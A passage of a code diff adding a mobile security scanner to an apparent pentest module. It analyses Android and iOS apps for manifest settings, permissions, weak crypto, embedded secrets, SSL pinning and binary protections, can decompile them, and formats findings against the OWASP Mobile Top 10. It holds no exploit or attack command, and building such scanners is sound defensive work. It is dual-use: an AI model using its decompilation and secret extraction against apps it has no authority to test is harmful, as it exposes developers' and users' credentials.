+            outputDir: params.outputDir,
+          })
+          return makeResult(
+            "Quick scan",
+            formatScanResult(quickResult),
+            { scanId: quickResult.id, appId: quickResult.appId, platform: quickResult.platform }
+          )
+
+        case "manifest":
+          if (!params.file) {
+            return makeResult("Manifest analysis", "Error: file path is required for manifest action")
+          }
+          const manifestResult = await MobileScanOrchestrator.analyze(params.file, {
+            profile: "discovery",
+            customProfile: {
+              staticAnalysis: {
+                manifest: true,
+                permissions: false,
+                components: false,
+                network: false,
+                crypto: false,
+                storage: false,
+                secrets: false,
+                urls: false,
+                sslPinning: false,
+                rootDetection: false,
+                obfuscation: false,
+                libraries: false,
+              },
+              decompile: { enabled: false, decompileResources: false, decompileSources: false, cleanupOnComplete: true },
+            },
+          })
+          return makeResult("Manifest analysis", formatManifest(manifestResult), { scanId: manifestResult.id })
+
+        case "permissions":
+          if (!params.file) {
+            return makeResult("Permission analysis", "Error: file path is required for permissions action")
+          }
+          const permResult = await MobileScanOrchestrator.analyze(params.file, {
+            profile: "discovery",
+            customProfile: {
+              staticAnalysis: {
+                manifest: true,
+                permissions: true,
+                components: false,
+                network: false,
+                crypto: false,
+                storage: false,
+                secrets: false,
+                urls: false,
+                sslPinning: false,
+                rootDetection: false,
+                obfuscation: false,
+                libraries: false,
+              },
+              decompile: { enabled: false, decompileResources: false, decompileSources: false, cleanupOnComplete: true },
+            },
+          })
+          return makeResult("Permission analysis", formatPermissions(permResult), { scanId: permResult.id })
+
+        case "network":
+          if (!params.file) {
+            return makeResult("Network security analysis", "Error: file path is required for network action")
+          }
+          const networkResult = await MobileScanOrchestrator.analyze(params.file, {
+            profile: "standard",
+            customProfile: {
+              staticAnalysis: {
+                manifest: true,
+                permissions: false,
+                components: false,
+                network: true,
+                crypto: false,
+                storage: false,
+                secrets: false,
+                urls: false,
+                sslPinning: true,
+                rootDetection: false,
+                obfuscation: false,
+                libraries: false,
+              },
+            },
+          })
+          return makeResult("Network security analysis", formatNetworkSecurity(networkResult), { scanId: networkResult.id })
+
+        case "storage":
+          if (!params.file) {
+            return makeResult("Storage security analysis", "Error: file path is required for storage action")
+          }
+          const storageResult = await MobileScanOrchestrator.analyze(params.file, {
+            profile: "standard",
+            customProfile: {
+              staticAnalysis: {
+                manifest: false,
+                permissions: false,
+                components: false,
+                network: false,
+                crypto: false,
+                storage: true,
+                secrets: false,
+                urls: false,
+                sslPinning: false,
+                rootDetection: false,
+                obfuscation: false,
+                libraries: false,
+              },
+            },
+          })
+          return makeResult("Storage security analysis", formatStorageSecurity(storageResult), { scanId: storageResult.id })
+
+        case "crypto":
+          if (!params.file) {
+            return makeResult("Cryptography analysis", "Error: file path is required for crypto action")
+          }
+          const cryptoResult = await MobileScanOrchestrator.analyze(params.file, {
+            profile: "standard",
+            customProfile: {
+              staticAnalysis: {
+                manifest: false,
+                permissions: false,
+                components: false,
+                network: false,
+                crypto: true,
+                storage: false,
+                secrets: false,
+                urls: false,
+                sslPinning: false,
+                rootDetection: false,
+                obfuscation: false,
+                libraries: false,
+              },
+            },
+          })
+          return makeResult("Cryptography analysis", formatCryptoAnalysis(cryptoResult), { scanId: cryptoResult.id })
+
+        case "secrets":
+          if (!params.file) {
+            return makeResult("Secret detection", "Error: file path is required for secrets action")
+          }
+          const secretsResult = await MobileScanOrchestrator.analyze(params.file, {
+            profile: "standard",
+            customProfile: {
+              staticAnalysis: {
+                manifest: false,
+                permissions: false,
+                components: false,
+                network: false,
+                crypto: false,
+                storage: false,
+                secrets: true,
+                urls: false,
+                sslPinning: false,
+                rootDetection: false,
+                obfuscation: false,
+                libraries: false,
+              },
+            },
+          })
+          return makeResult("Secret detection", formatSecrets(secretsResult), { scanId: secretsResult.id, count: secretsResult.secrets.length })
+
+        case "ssl-pinning":
+          if (!params.file) {
+            return makeResult("SSL pinning detection", "Error: file path is required for ssl-pinning action")
+          }
+          const sslResult = await MobileScanOrchestrator.analyze(params.file, {
+            profile: "standard",
+            customProfile: {
+              staticAnalysis: {
+                manifest: false,
+                permissions: false,
+                components: false,
+                network: false,
+                crypto: false,
+                storage: false,
+                secrets: false,
+                urls: false,
+                sslPinning: true,
+                rootDetection: false,
+                obfuscation: false,
+                libraries: false,
+              },
+            },
+          })
+          return makeResult("SSL pinning detection", formatSSLPinning(sslResult), { scanId: sslResult.id })
+
+        case "binary":
+          if (!params.file) {
+            return makeResult("Binary protection analysis", "Error: file path is required for binary action")
+          }
+          const binaryResult = await MobileScanOrchestrator.analyze(params.file, {
+            profile: "standard",
+            customProfile: {
+              staticAnalysis: {
+                manifest: true,
+                permissions: false,
+                components: false,
+                network: false,
+                crypto: false,
+                storage: false,
+                secrets: false,
+                urls: false,
+                sslPinning: false,
+                rootDetection: true,
+                obfuscation: true,
+                libraries: false,
+              },
+            },
+          })
+          return makeResult("Binary protection analysis", formatBinaryProtections(binaryResult), { scanId: binaryResult.id })
+
+        case "components":
+          if (!params.file) {
+            return makeResult("Component analysis", "Error: file path is required for components action")
+          }
+          const compResult = await MobileScanOrchestrator.analyze(params.file, {
+            profile: "discovery",
+            customProfile: {
+              staticAnalysis: {
+                manifest: true,
+                permissions: false,
+                components: true,
+                network: false,
+                crypto: false,
+                storage: false,
+                secrets: false,
+                urls: false,
+                sslPinning: false,
+                rootDetection: false,
+                obfuscation: false,
+                libraries: false,
+              },
+              decompile: { enabled: false, decompileResources: false, decompileSources: false, cleanupOnComplete: true },
+            },
+          })
+          return makeResult("Component analysis", formatComponents(compResult), { scanId: compResult.id })
+
+        case "decompile":
+          if (!params.file) {
+            return makeResult("Decompile app", "Error: file path is required for decompile action")
+          }
+          if (!params.outputDir) {
+            return makeResult("Decompile app", "Error: outputDir is required for decompile action")
+          }
+          const decompileResult = await MobileScanOrchestrator.analyze(params.file, {
+            profile: "discovery",
+            outputDir: params.outputDir,
+            customProfile: {
+              decompile: { enabled: true, decompileResources: true, decompileSources: true, cleanupOnComplete: false, outputDir: params.outputDir },
+              staticAnalysis: {
+                manifest: true,
+                permissions: false,
+                components: false,
+                network: false,
+                crypto: false,
+                storage: false,
+                secrets: false,
+                urls: false,
+                sslPinning: false,
+                rootDetection: false,
+                obfuscation: false,
+                libraries: false,
+              },
+            },
+          })
+          return makeResult(
+            "Decompile app",
+            `Decompiled ${decompileResult.platform} app to ${params.outputDir}\nScan ID: ${decompileResult.id}`,
+            { scanId: decompileResult.id, outputDir: params.outputDir }
+          )
+
+        case "sbom":
+          if (!params.file) {
+            return makeResult("Generate SBOM", "Error: file path is required for sbom action")
+          }
+          // For SBOM, we need to analyze with URL extraction to find dependencies
+          const sbomResult = await MobileScanOrchestrator.analyze(params.file, {
+            profile: "thorough",
+          })
+          return makeResult("Generate SBOM", formatSBOM(sbomResult), { scanId: sbomResult.id })
+
+        default:
+          return makeResult("Unknown action", `Unknown action: ${params.action}`)
+      }
+    },
+  }
+})
+
+/**
+ * Format scan result for display.
+ */
+function formatScanResult(result: MobileScanTypes.MobileScanResult): string {
+  const lines: string[] = []
+
+  lines.push(`Mobile Scan: ${result.id}`)
+  lines.push(`App ID: ${result.appId}`)
+  lines.push(`Platform: ${result.platform}`)
+  lines.push(`Profile: ${result.profile}`)
+  lines.push(`Status: ${result.status}`)
+
+  if (result.error) {
+    lines.push(`Error: ${result.error}`)
+  }
+
+  if (result.endTime && result.startTime) {
+    lines.push(`Duration: ${((result.endTime - result.startTime) / 1000).toFixed(1)}s`)
+  }
+
+  lines.push("")
+
+  // Summary
+  const criticalCount = result.findings.filter((f) => f.severity === "critical").length
+  const highCount = result.findings.filter((f) => f.severity === "high").length
+  const mediumCount = result.findings.filter((f) => f.severity === "medium").length
+  const lowCount = result.findings.filter((f) => f.severity === "low").length
+
+  lines.push("Summary:")
+  lines.push(`  Total Findings: ${result.findings.length}`)
+  lines.push(`  Critical: ${criticalCount}`)
+  lines.push(`  High: ${highCount}`)
+  lines.push(`  Medium: ${mediumCount}`)
+  lines.push(`  Low: ${lowCount}`)
+  lines.push(`  Secrets Found: ${result.secrets.length}`)
+  lines.push(`  URLs Extracted: ${result.urls.length}`)
+  lines.push("")
+
+  // Top findings
+  if (result.findings.length > 0) {
+    lines.push("Top Findings:")
+    const topFindings = result.findings
+      .sort((a, b) => severityOrder(a.severity) - severityOrder(b.severity))
+      .slice(0, 10)
+
+    for (const finding of topFindings) {
+      lines.push(`  [${finding.severity.toUpperCase()}] ${finding.title}`)
+      lines.push(`    OWASP: ${finding.owaspMobile} | Category: ${finding.category}`)
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Get severity order for sorting.
+ */
+function severityOrder(severity: string): number {
+  const order: Record<string, number> = {
+    critical: 0,
+    high: 1,
+    medium: 2,
+    low: 3,
+    info: 4,
+  }
+  return order[severity] ?? 5
+}
+
+/**
+ * Format apps for display.
+ */
+function formatApps(apps: MobileScanTypes.MobileApp[]): string {
+  if (apps.length === 0) {
+    return "No apps analyzed yet"
+  }
+
+  const lines: string[] = []
+  lines.push(`Found ${apps.length} analyzed apps`)
+  lines.push("")
+  lines.push("| Platform | Package Name | Version | Size |")
+  lines.push("|----------|--------------|---------|------|")
+
+  for (const app of apps.slice(0, 20)) {
+    const sizeMB = (app.size / 1024 / 1024).toFixed(1)
+    lines.push(`| ${app.platform} | ${app.packageName || app.name} | ${app.version || "-"} | ${sizeMB} MB |`)
+  }
+
+  if (apps.length > 20) {
+    lines.push(`... and ${apps.length - 20} more`)
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format findings for display.
+ */
+function formatFindings(findings: MobileScanTypes.MobileFinding[]): string {
+  if (findings.length === 0) {
+    return "No findings"
+  }
+
+  const lines: string[] = []
+  lines.push(`Found ${findings.length} findings`)
+  lines.push("")
+
+  for (const finding of findings) {
+    lines.push(`[${finding.severity.toUpperCase()}] ${finding.title}`)
+    lines.push(`  OWASP: ${finding.owaspMobile} | Category: ${finding.category}`)
+    lines.push(`  ${finding.description.slice(0, 200)}${finding.description.length > 200 ? "..." : ""}`)
+    if (finding.codeLocation) {
+      lines.push(`  Location: ${finding.codeLocation.file}${finding.codeLocation.line ? `:${finding.codeLocation.line}` : ""}`)
+    }
+    if (finding.recommendation) {
+      lines.push(`  Recommendation: ${finding.recommendation.slice(0, 150)}${finding.recommendation.length > 150 ? "..." : ""}`)
+    }
+    lines.push("")
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format manifest for display.
+ */
+function formatManifest(result: MobileScanTypes.MobileScanResult): string {
+  const lines: string[] = []
+
+  if (!result.manifest) {
+    return "No manifest data available"
+  }
+
+  if (result.platform === "android") {
+    const manifest = result.manifest as MobileScanTypes.AndroidManifest
+    lines.push("Android Manifest Analysis")
+    lines.push("=".repeat(40))
+    lines.push(`Package: ${manifest.packageName}`)
+    lines.push(`Version: ${manifest.versionName} (${manifest.versionCode})`)
+    lines.push(`Min SDK: ${manifest.minSdkVersion}`)
+    lines.push(`Target SDK: ${manifest.targetSdkVersion}`)
+    lines.push(`Debuggable: ${manifest.debuggable ? "YES (VULNERABLE)" : "No"}`)
+    lines.push(`Allow Backup: ${manifest.allowBackup ? "YES (RISKY)" : "No"}`)
+    lines.push("")
+    lines.push(`Activities: ${manifest.activities.length}`)
+    lines.push(`Services: ${manifest.services.length}`)
+    lines.push(`Receivers: ${manifest.receivers.length}`)
+    lines.push(`Providers: ${manifest.providers.length}`)
+    lines.push(`Permissions: ${manifest.permissions.length}`)
+  } else {
+    const plist = result.manifest as MobileScanTypes.IOSPlist
+    lines.push("iOS Info.plist Analysis")
+    lines.push("=".repeat(40))
+    lines.push(`Bundle ID: ${plist.bundleId}`)
+    lines.push(`Bundle Name: ${plist.bundleName}`)
+    lines.push(`Version: ${plist.version} (${plist.buildVersion})`)
+    lines.push(`Min iOS: ${plist.minOSVersion}`)
+    lines.push(`ATS Arbitrary Loads: ${plist.atsSettings?.allowsArbitraryLoads ? "YES (VULNERABLE)" : "No"}`)
+    lines.push(`URL Schemes: ${plist.urlSchemes.join(", ") || "None"}`)
+    lines.push(`Background Modes: ${plist.backgroundModes.join(", ") || "None"}`)
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format permissions for display.
+ */
+function formatPermissions(result: MobileScanTypes.MobileScanResult): string {
+  const lines: string[] = []
+
+  lines.push("Permission Analysis")
+  lines.push("=".repeat(40))
+
+  if (!result.permissions) {
+    return lines.join("\n") + "\nNo permission data available"
+  }
+
+  lines.push(`Total Permissions: ${result.permissions.total}`)
+  lines.push(`Dangerous: ${result.permissions.dangerous}`)
+  lines.push(`Normal: ${result.permissions.normal}`)
+  lines.push(`Signature: ${result.permissions.signature}`)
+  lines.push(`Custom: ${result.permissions.custom}`)
+  lines.push("")
+
+  if (result.permissions.highRisk.length > 0) {
+    lines.push("High Risk Permissions:")
+    for (const perm of result.permissions.highRisk) {
+      lines.push(`  [!] ${perm}`)
+    }
+    lines.push("")
+  }
+
+  if (result.permissions.unusualCombinations.length > 0) {
+    lines.push("Unusual Combinations:")
+    for (const combo of result.permissions.unusualCombinations) {
+      lines.push(`  [!] ${combo}`)
+    }
+    lines.push("")
+  }
+
+  if (result.permissions.recommendations.length > 0) {
+    lines.push("Recommendations:")
+    for (const rec of result.permissions.recommendations) {
+      lines.push(`  - ${rec}`)
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format network security for display.
+ */
+function formatNetworkSecurity(result: MobileScanTypes.MobileScanResult): string {
+  const lines: string[] = []
+
+  lines.push("Network Security Analysis")
+  lines.push("=".repeat(40))
+
+  if (!result.networkSecurity) {
+    return lines.join("\n") + "\nNo network security data available"
+  }
+
+  lines.push(`Cleartext Allowed: ${result.networkSecurity.cleartextAllowed ? "YES (VULNERABLE)" : "No"}`)
+  lines.push(`Insecure Connections: ${result.networkSecurity.insecureConnections.length}`)
+  lines.push(`Custom Trust Managers: ${result.networkSecurity.customTrustManagers.length}`)
+  lines.push("")
+
+  if (result.networkSecurity.sslPinning) {
+    lines.push("SSL Pinning:")
+    lines.push(`  Detected: ${result.networkSecurity.sslPinning.detected ? "Yes" : "NO (VULNERABLE)"}`)
+    if (result.networkSecurity.sslPinning.implementation) {
+      lines.push(`  Implementation: ${result.networkSecurity.sslPinning.implementation}`)
+    }
+    if (result.networkSecurity.sslPinning.pinnedDomains && result.networkSecurity.sslPinning.pinnedDomains.length > 0) {
+      lines.push(`  Pinned Domains: ${result.networkSecurity.sslPinning.pinnedDomains.join(", ")}`)
+    }
+    lines.push("")
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format storage security for display.
+ */
+function formatStorageSecurity(result: MobileScanTypes.MobileScanResult): string {
+  const lines: string[] = []
+
+  lines.push("Storage Security Analysis")
+  lines.push("=".repeat(40))
+
+  if (result.storageAnalysis) {
+    if (result.storageAnalysis.sharedPreferences) {
+      lines.push("SharedPreferences:")
+      lines.push(`  Found: ${result.storageAnalysis.sharedPreferences.found ? "Yes" : "No"}`)
+      if (result.storageAnalysis.sharedPreferences.worldReadable) {
+        lines.push("  [!] World Readable (VULNERABLE)")
+      }
+      if (result.storageAnalysis.sharedPreferences.worldWritable) {
+        lines.push("  [!] World Writable (VULNERABLE)")
+      }
+    }
+
+    if (result.storageAnalysis.sqlite) {
+      lines.push("SQLite:")
+      lines.push(`  Found: ${result.storageAnalysis.sqlite.found ? "Yes" : "No"}`)
+    }
+
+    if (result.storageAnalysis.externalStorage) {
+      lines.push("External Storage:")
+      lines.push(`  Used: ${result.storageAnalysis.externalStorage.used ? "Yes" : "No"}`)
+    }
+
+    if (result.storageAnalysis.logging && result.storageAnalysis.logging.sensitiveLogging.length > 0) {
+      lines.push("Sensitive Logging:")
+      lines.push(`  Locations: ${result.storageAnalysis.logging.sensitiveLogging.length}`)
+    }
+  }
+
+  // Storage-related findings
+  const storageFindings = result.findings.filter((f) => f.category === "storage")
+  if (storageFindings.length > 0) {
+    lines.push("")
+    lines.push("Storage Findings:")
+    for (const finding of storageFindings) {
+      lines.push(`  [${finding.severity.toUpperCase()}] ${finding.title}`)
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format crypto analysis for display.
+ */
+function formatCryptoAnalysis(result: MobileScanTypes.MobileScanResult): string {
+  const lines: string[] = []
+
+  lines.push("Cryptography Analysis")
+  lines.push("=".repeat(40))
+
+  if (result.cryptoAnalysis) {
+    if (result.cryptoAnalysis.weakAlgorithms.length > 0) {
+      lines.push("Weak Algorithms Found:")
+      for (const algo of result.cryptoAnalysis.weakAlgorithms) {
+        lines.push(`  [!] ${algo}`)
+      }
+      lines.push("")
+    }
+
+    if (result.cryptoAnalysis.hardcodedKeys.length > 0) {
+      lines.push(`Hardcoded Keys: ${result.cryptoAnalysis.hardcodedKeys.length}`)
+    }
+    if (result.cryptoAnalysis.insecureRandom.length > 0) {
+      lines.push(`Insecure Random: ${result.cryptoAnalysis.insecureRandom.length} locations`)
+    }
+    if (result.cryptoAnalysis.ecbMode.length > 0) {
+      lines.push(`ECB Mode Usage: ${result.cryptoAnalysis.ecbMode.length} locations`)
+    }
+    if (result.cryptoAnalysis.staticIV.length > 0) {
+      lines.push(`Static IV: ${result.cryptoAnalysis.staticIV.length} locations`)
+    }
+    if (result.cryptoAnalysis.md5Usage.length > 0) {
+      lines.push(`MD5 Usage: ${result.cryptoAnalysis.md5Usage.length} locations`)
+    }
+    if (result.cryptoAnalysis.sha1Usage.length > 0) {
+      lines.push(`SHA-1 Usage: ${result.cryptoAnalysis.sha1Usage.length} locations`)
+    }
+  }
+
+  // Crypto-related findings
+  const cryptoFindings = result.findings.filter((f) => f.category === "crypto")
+  if (cryptoFindings.length > 0) {
+    lines.push("")
+    lines.push("Crypto Findings:")
+    for (const finding of cryptoFindings) {
+      lines.push(`  [${finding.severity.toUpperCase()}] ${finding.title}`)
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format secrets for display.
+ */
+function formatSecrets(result: MobileScanTypes.MobileScanResult): string {
+  if (result.secrets.length === 0) {
+    return "No secrets detected"
+  }
+
+  const lines: string[] = []
+  lines.push(`Found ${result.secrets.length} potential secrets`)
+  lines.push("=".repeat(40))
+  lines.push("")
+
+  // Group by type
+  const byType = new Map<string, typeof result.secrets>()
+  for (const secret of result.secrets) {
+    const existing = byType.get(secret.type) || []
+    existing.push(secret)
+    byType.set(secret.type, existing)
+  }
+
+  for (const [type, secrets] of byType) {
+    lines.push(`${type}: ${secrets.length}`)
+    for (const secret of secrets.slice(0, 5)) {
+      const maskedValue = secret.value.length > 20
+        ? secret.value.slice(0, 10) + "..." + secret.value.slice(-5)
+        : secret.value.slice(0, 5) + "***"
+      lines.push(`  ${secret.location.file}:${secret.location.line || "?"}`)
+      lines.push(`    Value: ${maskedValue}`)
+      lines.push(`    Confidence: ${secret.confidence}`)
+    }
+    if (secrets.length > 5) {
+      lines.push(`  ... and ${secrets.length - 5} more`)
+    }
+    lines.push("")
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format SSL pinning for display.
+ */
+function formatSSLPinning(result: MobileScanTypes.MobileScanResult): string {
+  const lines: string[] = []
+
+  lines.push("SSL/TLS Certificate Pinning Analysis")
+  lines.push("=".repeat(40))
+
+  if (result.networkSecurity?.sslPinning) {
+    const ssl = result.networkSecurity.sslPinning
+    lines.push(`Detected: ${ssl.detected ? "Yes" : "NO (VULNERABLE)"}`)
+
+    if (ssl.detected) {
+      if (ssl.implementation) {
+        lines.push(`Implementation: ${ssl.implementation}`)
+      }
+      if (ssl.pinnedDomains && ssl.pinnedDomains.length > 0) {
+        lines.push("")
+        lines.push("Pinned Domains:")
+        for (const domain of ssl.pinnedDomains) {
+          lines.push(`  - ${domain}`)
+        }
+      }
+      if (ssl.locations && ssl.locations.length > 0) {
+        lines.push("")
+        lines.push("Implementation Locations:")
+        for (const loc of ssl.locations) {
+          lines.push(`  - ${loc.file}${loc.line ? `:${loc.line}` : ""}`)
+        }
+      }
+      if (ssl.bypassable !== undefined) {
+        lines.push("")
+        lines.push(`Bypassable: ${ssl.bypassable ? "Yes (consider runtime protection)" : "No"}`)
+      }
+    } else {
+      lines.push("")
+      lines.push("[!] No certificate pinning detected")
+      lines.push("[!] Application is vulnerable to man-in-the-middle attacks")
+      lines.push("")
+      lines.push("Recommendation:")
+      if (result.platform === "android") {
+        lines.push("  - Use OkHttp CertificatePinner")
+        lines.push("  - Implement TrustManager properly")
+        lines.push("  - Configure Network Security Config with pin-set")
+      } else {
+        lines.push("  - Implement URLSession delegate for pinning")
+        lines.push("  - Use TrustKit or Alamofire with ServerTrustManager")
+      }
+    }
+  } else {
+    lines.push("SSL pinning analysis not available")
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format binary protections for display.
+ */
+function formatBinaryProtections(result: MobileScanTypes.MobileScanResult): string {
+  const lines: string[] = []
+
+  lines.push("Binary Protection Analysis")
+  lines.push("=".repeat(40))
+
+  if (result.platform === "android") {
+    // For Android, use manifest data
+    const manifest = result.manifest as MobileScanTypes.AndroidManifest | undefined
+    if (manifest) {
+      lines.push(`Debuggable: ${manifest.debuggable ? "YES (VULNERABLE)" : "No"}`)
+      lines.push(`Allow Backup: ${manifest.allowBackup ? "YES (RISKY)" : "No"}`)
+      lines.push(`Min SDK: ${manifest.minSdkVersion}`)
+      lines.push(`Target SDK: ${manifest.targetSdkVersion}`)
+    } else {
+      lines.push("No manifest data available")
+    }
+  } else {
+    // For iOS, use binary protections
+    const bp = result.binaryProtections
+    if (bp) {
+      lines.push(`PIE (ASLR): ${bp.pie ? "Yes" : "NO (VULNERABLE)"}`)
+      lines.push(`ARC: ${bp.arc ? "Yes" : "NO (RISKY)"}`)
+      lines.push(`Stack Canary: ${bp.stackCanary ? "Yes" : "NO (VULNERABLE)"}`)
+      lines.push(`Symbols Stripped: ${bp.symbols === false ? "Yes" : "No (symbols exposed)"}`)
+      if (bp.encrypted !== undefined) {
+        lines.push(`Encrypted: ${bp.encrypted ? "Yes" : "No"}`)
+      }
+    } else {
+      lines.push("No binary protection data available")
+    }
+  }
+
+  // Root/Jailbreak detection
+  if (result.rootDetection) {
+    lines.push("")
+    lines.push("Root/Jailbreak Detection:")
+    lines.push(`  Detected: ${result.rootDetection.detected ? "Yes" : "NO (VULNERABLE)"}`)
+    if (result.rootDetection.detected && result.rootDetection.methods.length > 0) {
+      lines.push(`  Methods: ${result.rootDetection.methods.join(", ")}`)
+    }
+    if (result.rootDetection.strength) {
+      lines.push(`  Strength: ${result.rootDetection.strength}`)
+    }
+  }
+
+  // Obfuscation
+  if (result.obfuscation) {
+    lines.push("")
+    lines.push("Code Obfuscation:")
+    lines.push(`  Detected: ${result.obfuscation.detected ? "Yes" : "No"}`)
+    if (result.obfuscation.tool) {
+      lines.push(`  Tool: ${result.obfuscation.tool}`)
+    }
+    if (result.obfuscation.strength) {
+      lines.push(`  Strength: ${result.obfuscation.strength}`)
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format components for display.
+ */
+function formatComponents(result: MobileScanTypes.MobileScanResult): string {
+  if (result.platform !== "android" || !result.manifest) {
+    return "Component analysis is only available for Android apps"
+  }
+
+  const manifest = result.manifest as MobileScanTypes.AndroidManifest
+  const lines: string[] = []
+
+  lines.push("Android Component Analysis")
+  lines.push("=".repeat(40))
+  lines.push("")
+
+  // Activities
+  const exportedActivities = manifest.activities.filter((a) => a.exported)
+  lines.push(`Activities: ${manifest.activities.length} (${exportedActivities.length} exported)`)
+  if (exportedActivities.length > 0) {
+    for (const act of exportedActivities.slice(0, 10)) {
+      const perm = act.permission ? ` [${act.permission}]` : " [UNPROTECTED]"
+      lines.push(`  - ${act.name}${perm}`)
+    }
+    if (exportedActivities.length > 10) {
+      lines.push(`  ... and ${exportedActivities.length - 10} more`)
+    }
+  }
+  lines.push("")
+
+  // Services
+  const exportedServices = manifest.services.filter((s) => s.exported)
+  lines.push(`Services: ${manifest.services.length} (${exportedServices.length} exported)`)
+  if (exportedServices.length > 0) {
+    for (const svc of exportedServices.slice(0, 10)) {
+      const perm = svc.permission ? ` [${svc.permission}]` : " [UNPROTECTED]"
+      lines.push(`  - ${svc.name}${perm}`)
+    }
+    if (exportedServices.length > 10) {
+      lines.push(`  ... and ${exportedServices.length - 10} more`)
+    }
+  }
+  lines.push("")
+
+  // Receivers
+  const exportedReceivers = manifest.receivers.filter((r) => r.exported)
+  lines.push(`Receivers: ${manifest.receivers.length} (${exportedReceivers.length} exported)`)
+  if (exportedReceivers.length > 0) {
+    for (const rcv of exportedReceivers.slice(0, 10)) {
+      const perm = rcv.permission ? ` [${rcv.permission}]` : " [UNPROTECTED]"
+      lines.push(`  - ${rcv.name}${perm}`)
+    }
+    if (exportedReceivers.length > 10) {
+      lines.push(`  ... and ${exportedReceivers.length - 10} more`)
+    }
+  }
+  lines.push("")
+
+  // Providers
+  const exportedProviders = manifest.providers.filter((p) => p.exported)
+  lines.push(`Providers: ${manifest.providers.length} (${exportedProviders.length} exported)`)
+  if (exportedProviders.length > 0) {
+    for (const prov of exportedProviders.slice(0, 10)) {
+      const perm = prov.permission ? ` [${prov.permission}]` : " [UNPROTECTED]"
+      lines.push(`  - ${prov.name}${perm}`)
+    }
+    if (exportedProviders.length > 10) {
+      lines.push(`  ... and ${exportedProviders.length - 10} more`)
+    }
+  }
+
+  // Component findings
+  const componentFindings = result.findings.filter((f) => f.category === "components")
+  if (componentFindings.length > 0) {
+    lines.push("")
+    lines.push("Component Security Findings:")
+    for (const finding of componentFindings.slice(0, 15)) {
+      lines.push(`  [${finding.severity.toUpperCase()}] ${finding.title}`)
+    }
+    if (componentFindings.length > 15) {
+      lines.push(`  ... and ${componentFindings.length - 15} more`)
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format SBOM for display.
+ */
+function formatSBOM(result: MobileScanTypes.MobileScanResult): string {
+  const lines: string[] = []
+
+  lines.push("Software Bill of Materials (SBOM)")
+  lines.push("=".repeat(40))
+  lines.push("")
+
+  // App info
+  if (result.manifest) {
+    if (result.platform === "android") {
+      const manifest = result.manifest as MobileScanTypes.AndroidManifest
+      lines.push("Application:")
+      lines.push(`  Package: ${manifest.packageName}`)
+      lines.push(`  Version: ${manifest.versionName}`)
+    } else {
+      const plist = result.manifest as MobileScanTypes.IOSPlist
+      lines.push("Application:")
+      lines.push(`  Bundle ID: ${plist.bundleId}`)
+      lines.push(`  Version: ${plist.version}`)
+    }
+    lines.push("")
+  }
+
+  // Extract potential library references from URLs and strings
+  const domains = new Set<string>()
+  for (const url of result.urls) {
+    try {
+      const parsed = new URL(url.url)
+      domains.add(parsed.hostname)
+    } catch {
+      // Skip invalid URLs
+    }
+  }
+
+  if (domains.size > 0) {
+    lines.push("External Services/Dependencies:")
+    for (const domain of Array.from(domains).sort()) {
+      lines.push(`  - ${domain}`)
+    }
+    lines.push("")
+  }
+
+  // Detected SDKs/Libraries based on findings
+  const sdkIndicators: { [key: string]: string[] } = {
+    Firebase: ["firebase", "firebaseio.com", "googleapis.com/firebase"],
+    Facebook: ["facebook.com", "fb.com", "fbcdn"],
+    Google: ["google.com", "googleapis.com", "gstatic.com"],
+    AWS: ["amazonaws.com", "aws.amazon.com"],
+    Crashlytics: ["crashlytics", "fabric.io"],
+    Adjust: ["adjust.com", "adjust.io"],
+    AppsFlyer: ["appsflyer.com"],
+    Branch: ["branch.io", "app.link"],
+    Stripe: ["stripe.com"],
+    Braintree: ["braintreepayments.com", "braintree-api.com"],
+  }
+
+  const detectedSDKs = new Set<string>()
+  for (const url of result.urls) {
+    for (const [sdk, indicators] of Object.entries(sdkIndicators)) {
+      if (indicators.some((ind) => url.url.toLowerCase().includes(ind))) {
+        detectedSDKs.add(sdk)
+      }
+    }
+  }
+
+  if (detectedSDKs.size > 0) {
+    lines.push("Detected SDKs/Libraries:")
+    for (const sdk of Array.from(detectedSDKs).sort()) {
+      lines.push(`  - ${sdk}`)
+    }
+    lines.push("")
+  }
+
+  // Security-relevant components
+  lines.push("Security Summary:")
+  lines.push(`  Total Findings: ${result.findings.length}`)
+  lines.push(`  Secrets Found: ${result.secrets.length}`)
+  lines.push(`  External URLs: ${result.urls.length}`)
+
+  return lines.join("\n")
+}
diff --git a/packages/opencode/src/pentest/mobilescan/types.ts b/packages/opencode/src/pentest/mobilescan/types.ts
new file mode 100644
index 00000000000..0aac85fa078
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/types.ts
@@ -0,0 +1,931 @@
+/**
+ * @fileoverview Mobile Application Scanner Types
+ *
+ * Zod schemas and TypeScript types for mobile application security testing
+ * including Android APK and iOS IPA analysis, OWASP Mobile Top 10 coverage.
+ *
+ * @module pentest/mobilescan/types
+ */
+
+import z from "zod"
+
+/**
+ * Mobile scan types namespace.
+ */
+export namespace MobileScanTypes {
+  // ============================================
+  // Enums and Literals
+  // ============================================
+
+  /**
+   * Mobile platform.
+   */
+  export const Platform = z.enum(["android", "ios"])
+  export type Platform = z.infer<typeof Platform>
+
+  /**
+   * Scan status values.
+   */
+  export const Status = z.enum(["pending", "running", "completed", "failed", "stopped"])
+  export type Status = z.infer<typeof Status>
+
+  /**
+   * Scan profile IDs.
+   */
+  export const ProfileId = z.enum(["discovery", "quick", "standard", "thorough", "compliance", "custom"])
+  export type ProfileId = z.infer<typeof ProfileId>
+
+  /**
+   * Finding severity levels.
+   */
+  export const Severity = z.enum(["critical", "high", "medium", "low", "info"])
+  export type Severity = z.infer<typeof Severity>
+
+  /**
+   * OWASP Mobile Top 10 2024 categories.
+   */
+  export const OwaspMobile = z.enum([
+    "M1", // Improper Credential Usage
+    "M2", // Inadequate Supply Chain Security
+    "M3", // Insecure Authentication/Authorization
+    "M4", // Insufficient Input/Output Validation
+    "M5", // Insecure Communication
+    "M6", // Inadequate Privacy Controls
